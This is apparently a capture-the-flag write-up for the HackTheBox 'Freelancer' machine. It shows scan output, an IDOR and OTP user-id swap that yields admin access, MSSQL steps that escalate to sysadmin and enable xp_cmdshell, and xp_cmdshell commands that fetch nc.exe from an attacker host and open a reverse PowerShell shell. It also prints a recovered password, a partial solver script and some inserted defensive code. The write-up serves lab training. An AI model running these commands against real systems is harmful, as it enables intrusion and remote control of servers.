🆓Freelancer

User Flag

Enumeration

Initial recon always starts with a port scan, and if an HTTP port is open we can run dirsearch against it.

naabu --host 10.129.57.150 -v -p - -nmap-cli 'nmap -sV' -o 10.129.57.150.port

                  __
  ___  ___  ___ _/ /  __ __
 / _ \/ _ \/ _ \/ _ \/ // /
/_//_/\_,_/\_,_/_.__/\_,_/

		projectdiscovery.io

[INF] Current naabu version 2.3.1 (latest)
[INF] Running CONNECT scan with non root privileges
10.129.57.150:49671
10.129.57.150:49667
10.129.57.150:3268
10.129.57.150:53
10.129.57.150:52941
10.129.57.150:9389
10.129.57.150:5985
10.129.57.150:636
10.129.57.150:3269
10.129.57.150:593
10.129.57.150:49670
10.129.57.150:135
10.129.57.150:49672
10.129.57.150:139
10.129.57.150:445
10.129.57.150:80
10.129.57.150:88
10.129.57.150:52945
10.129.57.150:389
10.129.57.150:55820
10.129.57.150:55824
[INF] Found 21 ports on host 10.129.57.150 (10.129.57.150)
[INF] Running nmap command: nmap -sV -p 55820,636,49670,139,49671,3268,135,52945,55824,9389,593,5985,3269,389,445,88,52941,49667,49672,53,80 10.129.57.150
Starting Nmap 7.95 ( https://nmap.org ) at 2024-06-02 20:44 WIB
Nmap scan report for freelancer.htb (10.129.57.150)
Host is up (0.30s latency).

PORT      STATE    SERVICE       VERSION
53/tcp    open     domain        Simple DNS Plus
80/tcp    open     http          nginx 1.25.5
88/tcp    open     kerberos-sec  Microsoft Windows Kerberos (server time: 2024-06-02 18:44:16Z)
135/tcp   open     msrpc         Microsoft Windows RPC
139/tcp   open     netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open     ldap          Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
445/tcp   open     microsoft-ds?
593/tcp   open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open     tcpwrapped
3268/tcp  open     ldap          Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
3269/tcp  open     tcpwrapped
5985/tcp  open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open     mc-nmf        .NET Message Framing
49667/tcp open     msrpc         Microsoft Windows RPC
49670/tcp open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
49671/tcp open     msrpc         Microsoft Windows RPC
49672/tcp open     msrpc         Microsoft Windows RPC
52941/tcp filtered unknown
52945/tcp filtered unknown
55820/tcp open     msrpc         Microsoft Windows RPC
55824/tcp open     msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.38 seconds

dirsearch results against port 80:

dirsearch -u http://freelancer.htb
/usr/share/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11723

Output: /home/replican/Desktop/Prod/HackTheBox/machine/Freelancer/reports/http_freelancer.htb/__24-06-02_21-13-58.txt

Target: http://freelancer.htb/

[21:13:58] Starting:
[21:14:44] 400 -  157B  - /\..\..\..\..\..\..\..\..\..\etc\passwd
[21:14:48] 301 -    0B  - /about  ->  /about/
[21:14:51] 301 -    0B  - /accounts/login  ->  /accounts/login/
[21:14:55] 301 -    0B  - /admin  ->  /admin/
[21:14:58] 302 -    0B  - /admin/  ->  /admin/login/?next=/admin/
[21:14:58] 302 -    0B  - /admin/%3bindex/  ->  /admin/login/?next=/admin/%253Bindex/
[21:14:58] 302 -    0B  - /admin/.config  ->  /admin/login/?next=/admin/.config
[21:14:58] 302 -    0B  - /admin/.htaccess  ->  /admin/login/?next=/admin/.htaccess
[21:14:58] 302 -    0B  - /admin/_logs/access-log  ->  /admin/login/?next=/admin/_logs/access-log
[21:14:58] 302 -    0B  - /admin/_logs/access.log  ->  /admin/login/?next=/admin/_logs/access.log
[21:14:58] 302 -    0B  - /admin/_logs/access_log  ->  /admin/login/?next=/admin/_logs/access_log
[21:14:58] 302 -    0B  - /admin/_logs/err.log  ->  /admin/login/?next=/admin/_logs/err.log
[21:14:58] 302 -    0B  - /admin/_logs/error.log  ->  /admin/login/?next=/admin/_logs/error.log
[21:14:58] 302 -    0B  - /admin/_logs/error-log  ->  /admin/login/?next=/admin/_logs/error-log
[21:14:58] 302 -    0B  - /admin/_logs/error_log  ->  /admin/login/?next=/admin/_logs/error_log
[21:14:58] 302 -    0B  - /admin/access.log  ->  /admin/login/?next=/admin/access.log
[21:14:58] 302 -    0B  - /admin/access_log  ->  /admin/login/?next=/admin/access_log
[21:14:58] 302 -    0B  - /admin/access.txt  ->  /admin/login/?next=/admin/access.txt
[21:14:58] 302 -    0B  - /admin/account  ->  /admin/login/?next=/admin/account
[21:14:58] 302 -    0B  - /admin/account.aspx  ->  /admin/login/?next=/admin/account.aspx
[21:14:58] 302 -    0B  - /admin/account.php  ->  /admin/login/?next=/admin/account.php
[21:14:58] 302 -    0B  - /admin/account.jsp  ->  /admin/login/?next=/admin/account.jsp
[21:14:58] 302 -    0B  - /admin/account.js  ->  /admin/login/?next=/admin/account.js
[21:14:58] 302 -    0B  - /admin/_logs/login.txt  ->  /admin/login/?next=/admin/_logs/login.txt
[21:14:58] 302 -    0B  - /admin/admin-login  ->  /admin/login/?next=/admin/admin-login
[21:14:58] 302 -    0B  - /admin/admin-login.php  ->  /admin/login/?next=/admin/admin-login.php
[21:14:58] 302 -    0B  - /admin/admin-login.aspx  ->  /admin/login/?next=/admin/admin-login.aspx
[21:14:58] 302 -    0B  - /admin/account.html  ->  /admin/login/?next=/admin/account.html
[21:14:59] 302 -    0B  - /admin/admin-login.jsp  ->  /admin/login/?next=/admin/admin-login.jsp
[21:14:58] 302 -    0B  - /admin/admin  ->  /admin/login/?next=/admin/admin
[21:14:59] 302 -    0B  - /admin/admin-login.html  ->  /admin/login/?next=/admin/admin-login.html
[21:14:59] 302 -    0B  - /admin/admin-login.js  ->  /admin/login/?next=/admin/admin-login.js
[21:14:59] 302 -    0B  - /admin/admin.php  ->  /admin/login/?next=/admin/admin.php
[21:14:59] 302 -    0B  - /admin/admin.jsp  ->  /admin/login/?next=/admin/admin.jsp
[21:14:59] 302 -    0B  - /admin/admin.html  ->  /admin/login/?next=/admin/admin.html
[21:14:59] 302 -    0B  - /admin/admin.js  ->  /admin/login/?next=/admin/admin.js
[21:14:59] 302 -    0B  - /admin/admin.aspx  ->  /admin/login/?next=/admin/admin.aspx
[21:14:59] 302 -    0B  - /admin/admin/login  ->  /admin/login/?next=/admin/admin/login
[21:14:59] 302 -    0B  - /admin/admin_login  ->  /admin/login/?next=/admin/admin_login
[21:14:59] 302 -    0B  - /admin/admin_login.aspx  ->  /admin/login/?next=/admin/admin_login.aspx
[21:14:59] 302 -    0B  - /admin/admin_login.php  ->  /admin/login/?next=/admin/admin_login.php
[21:14:59] 302 -    0B  - /admin/admin_login.html  ->  /admin/login/?next=/admin/admin_login.html
[21:14:59] 302 -    0B  - /admin/adminLogin  ->  /admin/login/?next=/admin/adminLogin
[21:14:59] 302 -    0B  - /admin/admin_login.js  ->  /admin/login/?next=/admin/admin_login.js
[21:14:59] 302 -    0B  - /admin/admin_login.jsp  ->  /admin/login/?next=/admin/admin_login.jsp
[21:14:59] 302 -    0B  - /admin/adminLogin.php  ->  /admin/login/?next=/admin/adminLogin.php
[21:15:00] 302 -    0B  - /admin/adminLogin.aspx  ->  /admin/login/?next=/admin/adminLogin.aspx
[21:14:59] 302 -    0B  - /admin/adminer.php  ->  /admin/login/?next=/admin/adminer.php
[21:15:00] 302 -    0B  - /admin/backup/  ->  /admin/login/?next=/admin/backup/
[21:15:00] 302 -    0B  - /admin/adminLogin.js  ->  /admin/login/?next=/admin/adminLogin.js
[21:15:00] 302 -    0B  - /admin/adminLogin.html  ->  /admin/login/?next=/admin/adminLogin.html
[21:15:00] 302 -    0B  - /admin/backups/  ->  /admin/login/?next=/admin/backups/
[21:15:00] 302 -    0B  - /admin/controlpanel  ->  /admin/login/?next=/admin/controlpanel
[21:14:59] 302 -    0B  - /admin/adminLogin.jsp  ->  /admin/login/?next=/admin/adminLogin.jsp
[21:15:00] 302 -    0B  - /admin/config.php  ->  /admin/login/?next=/admin/config.php
[21:15:00] 302 -    0B  - /admin/controlpanel.php  ->  /admin/login/?next=/admin/controlpanel.php
[21:15:00] 302 -    0B  - /admin/controlpanel.aspx  ->  /admin/login/?next=/admin/controlpanel.aspx
[21:15:00] 302 -    0B  - /admin/controlpanel.jsp  ->  /admin/login/?next=/admin/controlpanel.jsp
[21:15:00] 302 -    0B  - /admin/cp.php  ->  /admin/login/?next=/admin/cp.php
[21:15:00] 302 -    0B  - /admin/controlpanel.js  ->  /admin/login/?next=/admin/controlpanel.js
[21:15:00] 302 -    0B  - /admin/cp  ->  /admin/login/?next=/admin/cp
[21:15:00] 302 -    0B  - /admin/cp.aspx  ->  /admin/login/?next=/admin/cp.aspx
[21:15:00] 302 -    0B  - /admin/cp.jsp  ->  /admin/login/?next=/admin/cp.jsp
[21:15:00] 302 -    0B  - /admin/controlpanel.html  ->  /admin/login/?next=/admin/controlpanel.html
[21:15:00] 302 -    0B  - /admin/cp.html  ->  /admin/login/?next=/admin/cp.html
[21:15:00] 302 -    0B  - /admin/cp.js  ->  /admin/login/?next=/admin/cp.js
[21:15:00] 302 -    0B  - /admin/data/autosuggest  ->  /admin/login/?next=/admin/data/autosuggest
[21:15:00] 302 -    0B  - /admin/db/  ->  /admin/login/?next=/admin/db/
[21:15:00] 302 -    0B  - /admin/default  ->  /admin/login/?next=/admin/default
[21:15:00] 302 -    0B  - /admin/default.asp  ->  /admin/login/?next=/admin/default.asp
[21:15:01] 302 -    0B  - /admin/default/admin.asp  ->  /admin/login/?next=/admin/default/admin.asp
[21:15:01] 302 -    0B  - /admin/default/login.asp  ->  /admin/login/?next=/admin/default/login.asp
[21:15:01] 302 -    0B  - /admin/download.php  ->  /admin/login/?next=/admin/download.php
[21:15:01] 302 -    0B  - /admin/dumper/  ->  /admin/login/?next=/admin/dumper/
[21:15:01] 302 -    0B  - /admin/error.log  ->  /admin/login/?next=/admin/error.log
[21:15:01] 302 -    0B  - /admin/error.txt  ->  /admin/login/?next=/admin/error.txt
[21:15:01] 302 -    0B  - /admin/error_log  ->  /admin/login/?next=/admin/error_log
[21:15:01] 302 -    0B  - /admin/FCKeditor  ->  /admin/login/?next=/admin/FCKeditor
[21:15:01] 302 -    0B  - /admin/errors.log  ->  /admin/login/?next=/admin/errors.log
[21:15:01] 302 -    0B  - /admin/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx  ->  /admin/login/?next=/admin/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx
[21:15:01] 302 -    0B  - /admin/export.php  ->  /admin/login/?next=/admin/export.php
[21:15:01] 302 -    0B  - /admin/fckeditor/editor/filemanager/connectors/asp/upload.asp  ->  /admin/login/?next=/admin/fckeditor/editor/filemanager/connectors/asp/upload.asp
[21:15:01] 302 -    0B  - /admin/fckeditor/editor/filemanager/connectors/asp/connector.asp  ->  /admin/login/?next=/admin/fckeditor/editor/filemanager/connectors/asp/connector.asp
[21:15:01] 302 -    0B  - /admin/fckeditor/editor/filemanager/connectors/aspx/connector.aspx  ->  /admin/login/?next=/admin/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
[21:15:01] 302 -    0B  - /admin/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php  ->  /admin/login/?next=/admin/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php
[21:15:02] 302 -    0B  - /admin/fckeditor/editor/filemanager/connectors/aspx/upload.aspx  ->  /admin/login/?next=/admin/fckeditor/editor/filemanager/connectors/aspx/upload.aspx
[21:15:02] 302 -    0B  - /admin/fckeditor/editor/filemanager/connectors/php/connector.php  ->  /admin/login/?next=/admin/fckeditor/editor/filemanager/connectors/php/connector.php
[21:15:02] 302 -    0B  - /admin/fckeditor/editor/filemanager/connectors/php/upload.php  ->  /admin/login/?next=/admin/fckeditor/editor/filemanager/connectors/php/upload.php
[21:15:02] 302 -    0B  - /admin/fckeditor/editor/filemanager/upload/aspx/upload.aspx  ->  /admin/login/?next=/admin/fckeditor/editor/filemanager/upload/aspx/upload.aspx
[21:15:01] 302 -    0B  - /admin/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp  ->  /admin/login/?next=/admin/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp
[21:15:02] 302 -    0B  - /admin/fckeditor/editor/filemanager/upload/asp/upload.asp  ->  /admin/login/?next=/admin/fckeditor/editor/filemanager/upload/asp/upload.asp
[21:15:02] 302 -    0B  - /admin/fckeditor/editor/filemanager/upload/php/upload.php  ->  /admin/login/?next=/admin/fckeditor/editor/filemanager/upload/php/upload.php
[21:15:02] 302 -    0B  - /admin/file.php  ->  /admin/login/?next=/admin/file.php
[21:15:02] 302 -    0B  - /admin/files.php  ->  /admin/login/?next=/admin/files.php
[21:15:02] 302 -    0B  - /admin/heapdump  ->  /admin/login/?next=/admin/heapdump
[21:15:02] 302 -    0B  - /admin/home  ->  /admin/login/?next=/admin/home
[21:15:02] 302 -    0B  - /admin/home.php  ->  /admin/login/?next=/admin/home.php
[21:15:02] 302 -    0B  - /admin/home.jsp  ->  /admin/login/?next=/admin/home.jsp
[21:15:02] 302 -    0B  - /admin/home.aspx  ->  /admin/login/?next=/admin/home.aspx
[21:15:02] 302 -    0B  - /admin/home.js  ->  /admin/login/?next=/admin/home.js
[21:15:02] 302 -    0B  - /admin/index  ->  /admin/login/?next=/admin/index
[21:15:02] 302 -    0B  - /admin/home.html  ->  /admin/login/?next=/admin/home.html
[21:15:02] 302 -    0B  - /admin/index.aspx  ->  /admin/login/?next=/admin/index.aspx
[21:15:02] 302 -    0B  - /admin/index.jsp  ->  /admin/login/?next=/admin/index.jsp
[21:15:02] 302 -    0B  - /admin/index.php  ->  /admin/login/?next=/admin/index.php
[21:15:02] 302 -    0B  - /admin/includes/configure.php~  ->  /admin/login/?next=/admin/includes/configure.php~
[21:15:02] 302 -    0B  - /admin/index.html  ->  /admin/login/?next=/admin/index.html
[21:15:02] 302 -    0B  - /admin/js/tiny_mce  ->  /admin/login/?next=/admin/js/tiny_mce
[21:15:02] 302 -    0B  - /admin/index.js  ->  /admin/login/?next=/admin/index.js
[21:15:02] 302 -    0B  - /admin/js/tiny_mce/  ->  /admin/login/?next=/admin/js/tiny_mce/
[21:15:02] 302 -    0B  - /admin/js/tinymce  ->  /admin/login/?next=/admin/js/tinymce
[21:15:03] 302 -    0B  - /admin/js/tinymce/  ->  /admin/login/?next=/admin/js/tinymce/
[21:15:03] 302 -    0B  - /admin/log  ->  /admin/login/?next=/admin/log
[21:15:03] 302 -    0B  - /admin/login  ->  /admin/login/?next=/admin/login
[21:15:03] 302 -    0B  - /admin/log/error.log  ->  /admin/login/?next=/admin/log/error.log
[21:15:03] 302 -    0B  - /admin/login.aspx  ->  /admin/login/?next=/admin/login.aspx
[21:15:03] 302 -    0B  - /admin/login.php  ->  /admin/login/?next=/admin/login.php
[21:15:03] 302 -    0B  - /admin/login.jsp  ->  /admin/login/?next=/admin/login.jsp
[21:15:03] 302 -    0B  - /admin/login.html  ->  /admin/login/?next=/admin/login.html
[21:15:03] 302 -    0B  - /admin/login.js  ->  /admin/login/?next=/admin/login.js
[21:15:03] 302 -    0B  - /admin/login.asp  ->  /admin/login/?next=/admin/login.asp
[21:15:04] 302 -    0B  - /admin/login.do  ->  /admin/login/?next=/admin/login.do
[21:15:04] 302 -    0B  - /admin/login.py  ->  /admin/login/?next=/admin/login.py
[21:15:04] 302 -    0B  - /admin/login.htm  ->  /admin/login/?next=/admin/login.htm
[21:15:04] 302 -    0B  - /admin/login.rb  ->  /admin/login/?next=/admin/login.rb
[21:15:04] 302 -    0B  - /admin/logon  ->  /admin/login/?next=/admin/logon
[21:15:04] 302 -    0B  - /admin/logon.jsp  ->  /admin/login/?next=/admin/logon.jsp
[21:15:04] 302 -    0B  - /admin/logon.aspx  ->  /admin/login/?next=/admin/logon.aspx
[21:15:04] 302 -    0B  - /admin/logon.html  ->  /admin/login/?next=/admin/logon.html
[21:15:04] 302 -    0B  - /admin/logs/access-log  ->  /admin/login/?next=/admin/logs/access-log
[21:15:04] 302 -    0B  - /admin/logs/err.log  ->  /admin/login/?next=/admin/logs/err.log
[21:15:04] 302 -    0B  - /admin/logs/access.log  ->  /admin/login/?next=/admin/logs/access.log
[21:15:04] 302 -    0B  - /admin/logs/access_log  ->  /admin/login/?next=/admin/logs/access_log
[21:15:04] 302 -    0B  - /admin/logon.php  ->  /admin/login/?next=/admin/logon.php
[21:15:04] 302 -    0B  - /admin/logs/error-log  ->  /admin/login/?next=/admin/logs/error-log
[21:15:04] 302 -    0B  - /admin/logon.js  ->  /admin/login/?next=/admin/logon.js
[21:15:04] 302 -    0B  - /admin/logs/  ->  /admin/login/?next=/admin/logs/
[21:15:04] 302 -    0B  - /admin/logs/error.log  ->  /admin/login/?next=/admin/logs/error.log
[21:15:04] 302 -    0B  - /admin/logs/error_log  ->  /admin/login/?next=/admin/logs/error_log
[21:15:04] 302 -    0B  - /admin/logs/errors.log  ->  /admin/login/?next=/admin/logs/errors.log
[21:15:04] 302 -    0B  - /admin/logs/login.txt  ->  /admin/login/?next=/admin/logs/login.txt
[21:15:04] 302 -    0B  - /admin/manage.asp  ->  /admin/login/?next=/admin/manage.asp
[21:15:04] 302 -    0B  - /admin/manage/admin.asp  ->  /admin/login/?next=/admin/manage/admin.asp
[21:15:04] 302 -    0B  - /admin/manage  ->  /admin/login/?next=/admin/manage
[21:15:05] 302 -    0B  - /admin/manage/login.asp  ->  /admin/login/?next=/admin/manage/login.asp
[21:15:05] 302 -    0B  - /admin/mysql/index.php  ->  /admin/login/?next=/admin/mysql/index.php
[21:15:05] 302 -    0B  - /admin/mysql/  ->  /admin/login/?next=/admin/mysql/
[21:15:05] 302 -    0B  - /admin/mysql2/index.php  ->  /admin/login/?next=/admin/mysql2/index.php
[21:15:05] 302 -    0B  - /admin/phpMyAdmin  ->  /admin/login/?next=/admin/phpMyAdmin
[21:15:05] 302 -    0B  - /admin/phpMyAdmin/  ->  /admin/login/?next=/admin/phpMyAdmin/
[21:15:05] 302 -    0B  - /admin/phpmyadmin/  ->  /admin/login/?next=/admin/phpmyadmin/
[21:15:05] 302 -    0B  - /admin/pMA/  ->  /admin/login/?next=/admin/pMA/
[21:15:05] 302 -    0B  - /admin/phpMyAdmin/index.php  ->  /admin/login/?next=/admin/phpMyAdmin/index.php
[21:15:05] 302 -    0B  - /admin/pma/  ->  /admin/login/?next=/admin/pma/
[21:15:05] 302 -    0B  - /admin/phpmyadmin2/index.php  ->  /admin/login/?next=/admin/phpmyadmin2/index.php
[21:15:05] 302 -    0B  - /admin/pma/index.php  ->  /admin/login/?next=/admin/pma/index.php
[21:15:05] 302 -    0B  - /admin/PMA/index.php  ->  /admin/login/?next=/admin/PMA/index.php
[21:15:05] 302 -    0B  - /admin/pol_log.txt  ->  /admin/login/?next=/admin/pol_log.txt
[21:15:05] 302 -    0B  - /admin/phpmyadmin/index.php  ->  /admin/login/?next=/admin/phpmyadmin/index.php
[21:15:06] 302 -    0B  - /admin/release  ->  /admin/login/?next=/admin/release
[21:15:06] 302 -    0B  - /admin/private/logs  ->  /admin/login/?next=/admin/private/logs
[21:15:06] 302 -    0B  - /admin/scripts/fckeditor  ->  /admin/login/?next=/admin/scripts/fckeditor
[21:15:06] 302 -    0B  - /admin/secure/logon.jsp  ->  /admin/login/?next=/admin/secure/logon.jsp
[21:15:06] 302 -    0B  - /admin/sqladmin/  ->  /admin/login/?next=/admin/sqladmin/
[21:15:06] 302 -    0B  - /admin/portalcollect.php?f=http://xxx&t=js  ->  /admin/login/?next=/admin/portalcollect.php%3Ff%3Dhttp%3A//xxx%26t%3Djs
[21:15:06] 302 -    0B  - /admin/sxd/  ->  /admin/login/?next=/admin/sxd/
[21:15:06] 302 -    0B  - /admin/sysadmin/  ->  /admin/login/?next=/admin/sysadmin/
[21:15:06] 302 -    0B  - /admin/tinymce  ->  /admin/login/?next=/admin/tinymce
[21:15:06] 302 -    0B  - /admin/upload.php  ->  /admin/login/?next=/admin/upload.php
[21:15:06] 302 -    0B  - /admin/uploads.php  ->  /admin/login/?next=/admin/uploads.php
[21:15:06] 302 -    0B  - /admin/signin  ->  /admin/login/?next=/admin/signin
[21:15:06] 302 -    0B  - /admin/user_count.txt  ->  /admin/login/?next=/admin/user_count.txt
[21:15:06] 302 -    0B  - /admin/views/ajax/autocomplete/user/a  ->  /admin/login/?next=/admin/views/ajax/autocomplete/user/a
[21:15:06] 302 -    0B  - /admin/web/  ->  /admin/login/?next=/admin/web/
[21:15:06] 302 -    0B  - /admin/tiny_mce  ->  /admin/login/?next=/admin/tiny_mce
[21:15:53] 301 -    0B  - /blog  ->  /blog/
[21:15:54] 200 -   19KB - /blog/
[21:16:07] 301 -    0B  - /contact  ->  /contact/
[21:16:46] 400 -  157B  - /index.php::$DATA
[21:18:00] 404 -  555B  - /static/api/swagger.json
[21:18:00] 404 -  555B  - /static/api/swagger.yaml
[21:18:00] 404 -  555B  - /static/dump.sql
[21:18:12] 400 -  157B  - /Trace.axd::$DATA
[21:18:24] 400 -  157B  - /web.config::$DATA

Task Completed

Port 80 is open, so we go straight to testing it. There is an IDOR bug in the validation flow: when we register as an employer, the account cannot be used yet because it has to be validated first. So we go straight to the account recovery feature.

Access it with a freelancer account (register one if you have not already),

enter the username of the employer account you want to activate,

and once the security questions are answered with the same answers given at registration, the employer account is activated.

There is a QR code feature, and when we scan the QR code

it contains the base64 string MTAwMTE, which decodes to 10011 and looks like a user id. Here I tried replacing it with the base64 encoding of 2.

Example: http://freelancer.htb/accounts/login/otp/MTAwMTE=/f41c9032a6f7c2c50ec62b7ef8b31d16/

becomes: http://freelancer.htb/accounts/login/otp/Mgo=/f41c9032a6f7c2c50ec62b7ef8b31d16/

And yep, we are admin now. As the dirsearch scan above showed, there is an /admin path, so we go straight there.
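The takeover above works because the OTP link's token is not bound to the base64 user id that precedes it, so swapping MTAwMTE= for Mgo= is still accepted. The following is an added example, not code from the write-up or from the Freelancer application: it models that weak check beside a hardened one in which the token is an HMAC over the user id and an expiry, so an id swap invalidates the token. The function names and the server key are constructed.

```python
import base64
import hashlib
import hmac
import secrets
import time
from typing import Optional, Tuple

# Constructed server-side secret; a real deployment loads this from configuration, never from the URL.
SERVER_KEY = secrets.token_bytes(32)


def b64_user_id(user_id: int) -> str:
    """Encode a user id the way the OTP link on this page does (10011 -> 'MTAwMTE=')."""
    return base64.b64encode(str(user_id).encode()).decode()


def decode_user_id(b64: str) -> int:
    # 'Mgo=' from the write-up decodes to '2\n', so strip whitespace before converting
    return int(base64.b64decode(b64).decode().strip())


# --- Weak design: the token is a random value that is valid for any user id placed in the same link ---
issued_tokens = set()


def issue_weak_link(user_id: int) -> Tuple[str, str]:
    token = secrets.token_hex(16)  # same shape as f41c9032a6f7c2c50ec62b7ef8b31d16 on this page
    issued_tokens.add(token)
    return b64_user_id(user_id), token


def verify_weak(b64_id: str, token: str) -> Optional[int]:
    """Returns the id the caller gets logged in as; the id is taken from the URL unchecked."""
    if token in issued_tokens:
        return decode_user_id(b64_id)
    return None


# --- Hardened design: token = expiry + HMAC(key, "user_id:expiry"), so the id is part of what is signed ---
def issue_bound_link(user_id: int, ttl: int = 300, now: Optional[int] = None) -> Tuple[str, str]:
    exp = (now if now is not None else int(time.time())) + ttl
    mac = hmac.new(SERVER_KEY, f"{user_id}:{exp}".encode(), hashlib.sha256).hexdigest()
    return b64_user_id(user_id), f"{exp}.{mac}"


def verify_bound(b64_id: str, token: str, now: Optional[int] = None) -> Optional[int]:
    try:
        user_id = decode_user_id(b64_id)
        exp_str, mac = token.split(".", 1)
        exp = int(exp_str)
    except (ValueError, UnicodeDecodeError):
        return None  # malformed id or token
    if (now if now is not None else int(time.time())) > exp:
        return None  # expired link
    expected = hmac.new(SERVER_KEY, f"{user_id}:{exp}".encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, mac):
        return None  # token was minted for a different id, or forged
    return user_id
```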

When I tried to show the tables it became clear what this database is. Our goal here is to spawn xp_cmdshell, since this is also a Windows box.

Bypassing sysadmin users

Because we are not sysadmin here and xp_cmdshell has been disabled with sp_configure, we need to escalate privileges using the following commands:

EXECUTE AS LOGIN = 'SA'
EXEC sp_addsrvrolemember 'Freelancer_webapp_user', 'sysadmin'
-- this turns on advanced options and is needed to configure xp_cmdshell
EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
-- this enables xp_cmdshell
EXEC sp_configure 'xp_cmdshell', '1' 
RECONFIGURE

Only after that can we use xp_cmdshell.

Now we just create a reverse shell. Here I use the nc binary:
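The escalation chain above (impersonating the SA login, adding the web application login to sysadmin, then enabling xp_cmdshell through sp_configure) leaves a distinctive sequence in any log of the raw SQL submitted through the admin panel. The following detector is an added example, not part of the write-up; it assumes a constructed one-request-per-line log format `<ts> session=<id> query=<sql>` and flags sessions that walk through that chain.

```python
import re
from typing import Dict, List

# Stages of the escalation chain shown above, in the order they are normally issued
STAGES = [
    ("impersonate_login", re.compile(r"\bEXECUTE\s+AS\s+LOGIN\s*=", re.I)),
    ("grant_sysadmin", re.compile(r"\bsp_addsrvrolemember\b.*\bsysadmin\b|\bALTER\s+SERVER\s+ROLE\s+sysadmin\b", re.I)),
    ("advanced_options", re.compile(r"\bsp_configure\b.*show\s+advanced\s+options", re.I)),
    ("enable_xp_cmdshell", re.compile(r"\bsp_configure\b.*xp_cmdshell", re.I)),
    # only an actual call at the start of a statement, not the string 'xp_cmdshell' passed to sp_configure
    ("run_xp_cmdshell", re.compile(r"(?:^|;)\s*(?:EXEC(?:UTE)?\s+)?(?:master\.(?:dbo\.)?|master\.\.)?xp_cmdshell\b", re.I)),
]

# Constructed log format (an assumption): one request to the raw-SQL endpoint per line
LINE_RE = re.compile(r"^(?P<ts>\S+)\s+session=(?P<sess>\S+)\s+query=(?P<sql>.*)$")


def classify(sql: str) -> List[str]:
    """Names of the chain stages that a single submitted query touches."""
    return [name for name, rx in STAGES if rx.search(sql)]


def analyse(lines: List[str]) -> Dict[str, List[str]]:
    """Per session, the chain stages observed, in first-seen order."""
    seen: Dict[str, List[str]] = {}
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        stages = seen.setdefault(m["sess"], [])
        for name in classify(m["sql"]):
            if name not in stages:
                stages.append(name)
    return seen


def alerts(lines: List[str], min_stages: int = 2) -> Dict[str, List[str]]:
    """Sessions that reach at least min_stages of the chain; enabling xp_cmdshell alone always alerts."""
    return {s: st for s, st in analyse(lines).items()
            if len(st) >= min_stages or "enable_xp_cmdshell" in st}


# Constructed sample log: one benign admin session, one walking the whole chain, one plain lookup
SAMPLE_LOG = [
    "2024-06-02T21:40:01Z session=s1 query=SELECT name FROM sys.tables",
    "2024-06-02T21:40:09Z session=s2 query=EXECUTE AS LOGIN = 'SA'; EXEC sp_addsrvrolemember 'Freelancer_webapp_user', 'sysadmin'",
    "2024-06-02T21:40:12Z session=s2 query=EXEC sp_configure 'show advanced options', '1'; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', '1'; RECONFIGURE",
    "2024-06-02T21:40:20Z session=s2 query=xp_cmdshell 'whoami'",
    "2024-06-02T21:41:00Z session=s3 query=SELECT COUNT(*) FROM sys.databases",
]

if __name__ == "__main__":
    for sess, stages in alerts(SAMPLE_LOG).items():
        print(f"ALERT session {sess}: {' -> '.join(stages)}")
```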

xp_cmdshell 'echo IWR http://10.10.14.88:1337/nc.exe -OutFile %TEMP%\nc.exe | powershell -noprofile'
xp_cmdshell '%TEMP%\nc.exe 10.10.14.88 1338 -e powershell'

And yep, we got a reverse shell.

Next we just dump the SQL user's password to get a shell as the mikasha user.

IL0v3ErenY3ager is the password; from here it is just a matter of RunAs, folks.

Solver python script

import base64
import re
from io import BytesIO

import httpx
from bs4 import BeautifulSoup
from PIL import Image
from pwn import *
from pyzbar.pyzbar import decode

URL = "http://freelancer.htb"
# change this to 'debug' if you want to see the csrf logger
context.log_level = 'info'


class BaseAPI:
    def __init__(self, url=URL) -> None:
        # all traffic goes through a local intercepting proxy (Burp) so requests can be inspected
        self.c = httpx.Client(base_url=url, proxy="http://127.0.0.1:8080")


class API(BaseAPI):
    def getCsrfToken(self, path):
        # fetch the page once to collect the csrftoken cookie and the csrfmiddlewaretoken form value
        if hasattr(self, 'admin_cookies'):
            r = self.c.get(path, cookies={
                'sessionid': self.admin_cookies
            }, follow_redirects=True)
        else:
            r = self.c.get(path)
        self.csrf_token = r.cookies["csrftoken"]
        soup = BeautifulSoup(r.text, "html.parser")
        csrf = soup.find("input", {"name": "csrfmiddlewaretoken"})
        if csrf:
            self.csrf_middleware = csrf["value"]
            debug(f"csrf/{self.csrf_middleware} from path {path}")
        else:
            # some pages only carry the token inside inline javascript
            csrf_value = re.findall(r'csrfmiddlewaretoken: "(.*?)"', r.text)
            if csrf_value:
                self.csrf_middleware = csrf_value[0]
                debug(f"csrf/{self.csrf_middleware} from path {path}")
            else:
                warn("csrf token/middleware is not found")

    def FreelancerLogin(self, user, password):
        path = "/accounts/login/"
        self.getCsrfToken(path)
        r = self.c.post(path, data={
            "csrfmiddlewaretoken": self.csrf_middleware,
            "username": user,
            "password": password
        })
        self.freelancer_sessionid = r.cookies["sessionid"]
        info(f"success login freelancer account {user}:{password}")

